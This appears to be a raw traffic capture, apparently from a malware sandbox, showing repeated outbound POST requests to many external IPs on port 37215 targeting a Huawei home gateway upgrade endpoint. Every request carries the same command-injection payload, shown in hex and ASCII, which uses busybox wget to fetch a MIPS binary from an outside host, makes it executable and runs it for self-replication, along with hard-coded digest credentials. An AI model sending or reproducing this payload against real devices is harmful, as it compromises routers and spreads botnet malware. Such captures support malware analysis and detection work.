                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2304192.168.2.1349298157.215.148.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783328056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2305192.168.2.133434892.228.67.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783344030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2306192.168.2.1349760197.216.192.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783361912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2307192.168.2.133586041.36.87.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783380985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2308192.168.2.1333164197.255.54.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783471107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2309192.168.2.1351148157.86.144.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783494949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2310192.168.2.1332846157.210.147.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783514977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2311192.168.2.1340638157.246.34.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783531904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2312192.168.2.134505699.146.51.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783677101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2313192.168.2.1360310197.210.48.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783694983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
